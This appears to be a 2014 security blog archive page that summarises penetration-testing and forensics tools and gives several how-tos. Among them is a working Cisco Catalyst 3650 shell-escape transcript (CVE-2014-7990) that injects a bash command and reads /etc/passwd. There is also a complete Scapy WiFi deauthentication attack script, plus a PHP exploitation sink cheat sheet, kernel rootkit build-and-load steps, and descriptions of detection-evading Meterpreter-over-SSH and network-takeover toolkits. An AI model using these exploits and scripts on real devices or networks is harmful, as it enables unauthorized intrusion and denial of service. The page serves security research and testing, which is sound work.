Nov 15, 2014

Tools: Radare - Forensic Android Tool

Radare project started as a forensics tool, an scriptable commandline hexadecimal editor able to open disk files, but later support for analyzing binaries, disassembling code, debugging programs, attaching to remote gdb servers, ..
radare2 is portable.

6502, 8051, arm, arc, avr, bf, tms320 (c54x, c55x, c55+), gameboy csr, dcpu16, dalvik, i8080, mips, m68k, mips, msil, snes, nios II, sh, sparc, rar, powerpc, i386, x86-64, H8/300, malbolge, T8200
File Formats:
bios, dex, elf, elf64, filesystem, java, fatmach0, mach0, mach0-64, MZ, PE, PE+, TE, COFF, plan9, bios, dyldcache, Gameboy and Nintendo DS ROMs
Operating Systems:
Android, GNU/Linux, [Net|Free|Open]BSD, iOS, OSX, QNX, w32, w64, Solaris, Haiku, FirefoxOS
Vala/Genie, Python (2, 3), NodeJS, LUA, Go, Perl, Guile, php5, newlisp, Ruby, Java, OCAM
  • Multi-architecture and multi-platform
    • GNU/Linux, Android, *BSD, OSX, iPhoneOS, Windows{32,64} and Solaris
    • i8080, 8051, x86{16,32,64}, avr, arc{4,compact}, arm{thumb,neon,aarch64}, c55x+, dalvik, ebc, gb, java, sparc, mips, nios2, powerpc, whitespace, brainfuck, malbolge, z80, psosvm, m68k, msil, sh, snes, gb, dcpu16, csr, arc
    • pe{32,64}, te, [fat]mach0{32,64}, elf{32,64}, bios/uefi, dex and java classes
  • Highly scriptable
    • Vala, Go, Python, Guile, Ruby, Perl, Lua, Java, JavaScript, sh, ..
    • batch mode and native plugins with full internal API access
    • native scripting based in mnemonic commands and macros
  • Hexadecimal editor
    • 64bit offset support with virtual addressing and section maps
    • Assemble and disassemble from/to many architectures
    • colorizes opcodes, bytes and debug register changes
    • print data in various formats (int, float, disasm, timestamp, ..)
    • search multiple patterns or keywords with binary mask support
    • checksumming and data analysis of byte blocks
  • IO is wrapped
    • support Files, disks, processes and streams
    • virtual addressing with sections and multiple file mapping
    • handles gdb:// and rap:// remote protocols
  • Filesystems support
    • allows to mount ext2, vfat, ntfs, and many others
    • support partition types (gpt, msdos, ..)
  • Debugger support
    • gdb remote and brainfuck debugger support
    • software and hardware breakpoints
    • tracing and logging facilities
  • Diffing between two functions or binaries
  • Code analysis at opcode, basicblock, function levels
    • embedded simple virtual machine to emulate code
    • keep track of code and data references
    • function calls and syscall decompilation
    • function description, comments and library signatures

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: MeterSSH – Meterpreter over SSH

As penetration testers, it’s continual to identify what types of attacks are detected and what’s not. After running into a recent penetration test with a next generation firewall, most analysis has shifted away from the endpoints and more towards network analysis. While there needs to be a mixture of both, MeterSSH demonstrates how easy it is to circumvent a lot of these signature based “next generation” product lines.
MeterSSH is an easy way to inject native shellcode into memory and pipe anything over SSH to the attacker machine through an SSH tunnel and all self contained into one single Python file. Python can easily be converted to an executable using pyinstaller or py2exe.


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nov 13, 2014

Tools: Simple-Rootkit - A simple attack against gcc and Python via kernel module, with highly detailed comments.

A simple attack via kernel module, with highly detailed comments.
Here we'll compile a kernel module which intercepts every "read" system call, searches for a string and replaces it if it looks like the gcc compiler or the python interpreter. This is meant to demonstrate how a compromised system can build a malicious binary from perfectly safe source code.
For more information see:
Also check out:


Install your kernel headers
sudo apt-get install linux-headers-$(uname -r)
Run make
cd simple-rootkit && make
Load the module
sudo insmod simple-rootkit.ko
Compile any C or run any Python script and all instances of the string "World!" will now read as Mrrrgn.
gcc hello.c -o hello

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

List of resource for MS14-066(Schannel)  


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Nogotofail v0.4 Beta – TLS/SSL Testing Released

Nogotofail is a network security testing tool designed to help developers and security researchers spot and fix weak TLS/SSL connections and sensitive cleartext traffic on devices and applications in a flexible, scalable, powerful way. It includes testing for common SSL certificate verification issues, HTTPS and TLS/SSL library bugs, SSL and STARTTLS stripping issues, cleartext issues, and more.


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: OWASP ASVS Assessment Tool (OWAAT)

OWASP ASVS Assessment Tool (OWAAT) is a tool, used to verify Web applications security conformance to the OWASP Application Security Verification Standard (ASVS). It is licensed under AGPLv3.

OWAAT is a Web-based tool and provides team work capabilities.
It allows to create multiple assessment projects and assign assessment tasks to different users. This tool is written in PHP and JavaScript using the jQuery library.


  • User management: A team of analysts can easily collaborate in an application assessment process.
  • Verification methodology: It allows to define custom verification methods for each rule.
  • Project-based Assessment: Multiple assessment projects can be defined and managed.
  • Task Assignment: It allows to assign assessment tasks to each user.
  • Reporting: It enables to create reports from assessment results.

More Information:

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nov 11, 2014

Howto: Escape Cisco Catalyst 3650 authentication to get a Linux shell (CVE-2014-7990)

 Alright then, let's go again. More, code execution before key verification. Nice.
Switch#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: b577ea00feb8c833d725a85c6c53e1839ab9[..]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`bash 1>&2`
bash-3.2# uname -a
Linux localhost #1 SMP PREEMPT Fri May 10 11:48:14 PDT 2013 mips64 GNU/Linux
bash-3.2# ls
BinOS       config     hugepages  lic0        rommon_to_env  sys     webui
RP_0_0_cli  crashinfo  include    lic1        root           tftp
auto        dev        install    lkern_init  sbin           tmp
bin         drec0      isan       misc        selinux        ucode0
bsn         epc        issu       mnt         share          usr
chasfs      etc        lib        obfl0       space          var
common      flash      lib32      proc        spi            vol
bash-3.2# whoami
bash-3.2# cat /etc/passwd
binos:x:85:85:binos administrative user:/usr/binos/conf:/usr/binos/conf/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nov 10, 2014

Tool: Web Application Protection

WAP 2.0 is a source code static analysis and data mining tool to detect and correct input validation vulnerabilities in web applications written in PHP (version 4.0 or higher) and with a low rate of false positives. WAP detects and corrects the following vulnerabilities:
  • SQL Injection (SQLI)
  • Cross-site scripting (XSS)
  • Remote File Inclusion (RFI)
  • Local File Inclusion (LFI)
  • Directory Traversal or Path Traversal (DT/PT)
  • Source Code Disclosure (SCD)
  • OS Command Injection (OSCI)
  • PHP Code Injection

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

CheatSheet: Python By addedbytes


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

List of resource for WireLurker malware in OSX


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

List of PHP Exploitation Code

Command Execution

exec           - Returns last line of commands output
passthru       - Passes commands output directly to the browser
system         - Passes commands output directly to the browser and returns last line
shell_exec     - Returns commands output
`` (backticks) - Same as shell_exec()
popen          - Opens read or write pipe to process of a command
proc_open      - Similar to popen() but greater degree of control
pcntl_exec     - Executes a program

PHP Code Execution

Apart from eval there are other ways to execute PHP code: include/require can be used for remote code execution in the form of Local File Include and Remote File Include vulnerabilities.
assert()  - identical to eval()
preg_replace('/.*/e',...) - /e does an eval() on the match
$func = new ReflectionFunction($_GET['func_name']); $func->invoke(); or $func->invokeArgs(array());

List of functions which accept callbacks

These functions accept a string parameter which could be used to call a function of the attacker's choice. Depending on the function the attacker may or may not have the ability to pass a parameter. In that case an Information Disclosure function like phpinfo() could be used.
Function                     => Position of callback arguments
'ob_start'                   =>  0,
'array_diff_uassoc'          => -1,
'array_diff_ukey'            => -1,
'array_filter'               =>  1,
'array_intersect_uassoc'     => -1,
'array_intersect_ukey'       => -1,
'array_map'                  =>  0,
'array_reduce'               =>  1,
'array_udiff_assoc'          => -1,
'array_udiff_uassoc'         => array(-1, -2),
'array_udiff'                => -1,
'array_uintersect_assoc'     => -1,
'array_uintersect_uassoc'    => array(-1, -2),
'array_uintersect'           => -1,
'array_walk_recursive'       =>  1,
'array_walk'                 =>  1,
'assert_options'             =>  1,
'uasort'                     =>  1,
'uksort'                     =>  1,
'usort'                      =>  1,
'preg_replace_callback'      =>  1,
'spl_autoload_register'      =>  0,
'iterator_apply'             =>  1,
'call_user_func'             =>  0,
'call_user_func_array'       =>  0,
'register_shutdown_function' =>  0,
'register_tick_function'     =>  0,
'set_error_handler'          =>  0,
'set_exception_handler'      =>  0,
'session_set_save_handler'   => array(0, 1, 2, 3, 4, 5),
'sqlite_create_aggregate'    => array(2, 3),
'sqlite_create_function'     =>  2,

Information Disclosure

Most of these function calls are not sinks. But rather it maybe a vulnerability if any of the data returned is viewable to an attacker. If an attacker can see phpinfo() it is definitely a vulnerability.


extract - Opens the door for register_globals attacks (see study in scarlet).
parse_str -  works like extract if only one argument is given.  
mail - has CRLF injection in the 3rd parameter, opens the door for spam. 
header - on old systems CRLF injection could be used for xss or other purposes, now it is still a problem if they do a header("location: ..."); and they do not die();. The script keeps executing after a call to header(), and will still print output normally. This is nasty if you are trying to protect an administrative area. 

Filesystem Functions

According to RATS all filesystem functions in php are nasty. Some of these don't seem very useful to the attacker. Others are more useful than you might think. For instance if allow_url_fopen=On then a url can be used as a file path, so a call to copy($_GET['s'], $_GET['d']); can be used to upload a PHP script anywhere on the system. Also if a site is vulnerable to a request send via GET everyone of those file system functions can be abused to channel and attack to another host through your server.
// open filesystem handler
// write to filesystem (partially in combination with reading)
imagepng   - 2nd parameter is a path.
imagewbmp  - 2nd parameter is a path. 
image2wbmp - 2nd parameter is a path. 
imagejpeg  - 2nd parameter is a path.
imagexbm   - 2nd parameter is a path.
imagegif   - 2nd parameter is a path.
imagegd    - 2nd parameter is a path.
imagegd2   - 2nd parameter is a path.


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Differential Analysis of Malware in Memory(DAMM)

An open source memory analysis tool built on top of Volatility. It is meant as a proving ground for interesting new techniques to be made available to the community. These techniques are an attempt to speed up the investigation process through data reduction and codifying some expert knowledge.


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Securely Delete the Trash (Recycle Bin) in Windows

Eraser is an easy to use program that allows you to delete files and folders securely while overwriting the files with carefully selected random data, rendering them useless. Eraser allows you to delete files on demand or schedule file deletion at a specified time in the future.
The program offers 13 different deleting techniques that will ensure that your deleted data is completely irrecoverable. The first method is Eraser’s default setting and the two DoD methods are the second and third most commonly used methods.
  1. Gutmann method 35-pass Method
  2. US DoD 5220.22-M standard 3-pass Method
  3. US DoD 5220.22-M standard 7-pass Method
1. Download Eraser

2. Setup Eraser

3. Simply double-click on the Eraser desktop icon and click on “Settings.” Change the erasure setting, and then press the “Save Settings” button

4.  you can do that with the right-click context menu. Simply find a file you want to delete, then right-click on it. After that, select the Eraser context menu and choose whether you want to erase the file now or on the next computer restart.
You can also do the same thing with files in the recycle bin by following the same process described above.


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Scapy Python Script for Wifideauth by @Catalyst256

#!/usr/bin/env python
# Scapy based wifi Deauth by @catalyst256
# Change the client to FF:FF:FF:FF:FF:FF if you want a broadcasted deauth to all stations on the targeted Access Point
import sys
if len(sys.argv) != 5:
print 'Usage is ./ interface bssid client count'
print 'Example - ./ mon0 00:11:22:33:44:55 55:44:33:22:11:00 50'
from scapy.all import *
conf.iface = sys.argv[1] # The interface that you want to send packets out of, needs to be set to monitor mode
bssid = sys.argv[2] # The BSSID of the Wireless Access Point you want to target
client = sys.argv[3] # The MAC address of the Client you want to kick off the Access Point
count = sys.argv[4] # The number of deauth packets you want to send
conf.verb = 0
packet = RadioTap()/Dot11(type=0,subtype=12,addr1=client,addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7)
for n in range(int(count)):
print 'Deauth sent via: ' + conf.iface + ' to BSSID: ' + bssid + ' for Client: ' + client


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Setup PHP Debugger with Sublime in Kali(Debian)

1. Install Sublime
# wget ""
# dpkg -i sublime-text_build-3065_amd64.deb

2. Run sublime
# cd /opt/sublime_text
# ./sublime_text

3. Install package control plugin. Open View -> Show Console
If you use Sublime2
"import urllib2,os,hashlib; h = '7183a2d3e96f11eeadd761d777e62404' + 'e330c659d4bb41d3bdf022e94cab3cd0'; pf = 'Package Control.sublime-package'; ipp = sublime.installed_packages_path(); os.makedirs( ipp ) if not os.path.exists(ipp) else None; urllib2.install_opener( urllib2.build_opener( urllib2.ProxyHandler()) ); by = urllib2.urlopen( '' + pf.replace(' ', '%20')).read(); dh = hashlib.sha256(by).hexdigest(); open( os.path.join( ipp, pf), 'wb' ).write(by) if dh == h else None; print('Error validating download (got %s instead of %s), please try manual install' % (dh, h) if dh != h else 'Please restart Sublime Text to finish installation')"

If you use Sublime3(in this post, we use this version)
Place this code and enter
"import urllib.request,os,hashlib; h = '7183a2d3e96f11eeadd761d777e62404' + 'e330c659d4bb41d3bdf022e94cab3cd0'; pf = 'Package Control.sublime-package'; ipp = sublime.installed_packages_path(); urllib.request.install_opener( urllib.request.build_opener( urllib.request.ProxyHandler()) ); by = urllib.request.urlopen( '' + pf.replace(' ', '%20')).read(); dh = hashlib.sha256(by).hexdigest(); print('Error validating download (got %s instead of %s), please try manual install' % (dh, h)) if dh != h else open(os.path.join( ipp, pf), 'wb' ).write(by) " 

4. Restart Sublime

5. Go to Preference -> Package Control to Install Package(Plugin)

6. Type xdebug and install it

7. Install LAMP(Linux + Apache2 + MySQL + PHP) and requirement software
#  apt-get install apache2 php5 php5-gd mysql-server php5-mysql php5-dev php-pear make python

8. Install Xdebug module for PHP5
# apt-get install php5-xdebug

Configure xdebug module in /etc/php5/conf.d/20-xdebug.ini, and fill with this options

9. Restart Apache2
# /etc/init.d/apache2 restart

9. Create example loop php file in sublime
    $arr = array(1, 2, 3, 4);

    foreach ($arr as &$value)
            $value = $value * 2;

            print $value;

10. In Sublime, create some  break point with right click and Xdebug -> Add/Remove Break Point.

11. In Sublime menu, Go to "Tools -> Xdebug -> Start Debugging"
(You can see the config of Sublime from "Tools -> Xdebug -> Settings Default(Or Settings User)")

12. Open Firefox

13. Install "The easiest Xdebug 2.0" addon

14. Restart Firefox

15.  Go to "Tools -> Addon", Open Preference of The easiest Xdebug 2.0

16. Input "sublime.xdebug" into IDE key for remote debugging.

17. Visit the page that we want to debug(same page of step#9). Click the bug in the right side

18. Try to refresh it in web browser, the debug was begin and in sublime will control the output page.

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Heybe – Penetration Testing Automation Toolkit

Heybe is Penetration Testing Automation Kit. It consists of modules that can be used to fully automate pen-tests and make them mode effective. With Heybe you can 0wn all systems in a target company in matter of minutes.
Heybe modules:
  • Fener: fast network discovery tool optimized for speed. Fener leverages several networking tools to discover all hosts within target network.
  • Kevgir : automatic vulnerability scan tool. Kevgir is an automated vulnerability scanning tool optimized for speed. With Kevgir, an entire internal network can be scanned for specific vulnerabilities within minutes.
  • Sees: high precision social engineering tool. Sees is used for performing tail-made social engineering campaigns with high success ratio.
  • Kacak: automatic domain admin takeover tool. Kacak is developed to discover target windows machines in network and take over entire Windows domain automatically.
  • Depdep: post exploitation tool. Depdep is a merciless sentinel which will seek sensitive files containing critical info leaking through your network
  • Cilingir: remote password cracker. Cilingir is a tool used to automate password / hash capturing and cracking process. Captured credentials are automatically sent to a remote password cracking server and cracked passwords are automatically stored in a local loot for usage during pen-test.
  • Levye : brute force tool. Levye is used for automating brute forcing process against common and not so common protocols like openvpn.

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Hooker: Automated Dynamic Analysis of Android Applications

Hooker is an opensource project for dynamic analysis of Android applications. This project provides various tools and applications that can be use to automaticaly intercept and modify any API calls made by a targeted application. It leverages Android Substrate framework to intercept these calls and aggregate all their contextual information (parameters, returned values, ...) in an elasticsearch database. A set of python scripts can be used to automatize the execution of an analysis in order to collect any API calls made by a set of applications.

Technical Description

Hooker is made of multiple modules:
  1. APK-instrumenter is an Android application that must be installed prior to the analysis on an Android device (for instance, an emulator).
  2. hooker_xp is a python tool that can be use to control the android device and trigger the installation and stimulation of an application on it.
  3. hooker_analysis is a python script that can be use to collect results stored in the elasticsearch database.
  4. tools/APK-contactGenerator is an Android application that is automatically installed on the Android device by hooker_xp to inject fake contact informations.
  5. tools/apk_retriever is a Python tool that can be use to download APKs from various online public Android markets.
  6. tools/emulatorCreator is a script that can be use to prepare an emulator.

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Ragpicker - Plugin for pre-analysis and reporting in Cuckoo

Ragpicker is a Plugin based malware crawler with pre-analysis and reporting functionalities. Use this tool if you are testing antivirus products, collecting malware for another analyzer/zoo.  


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.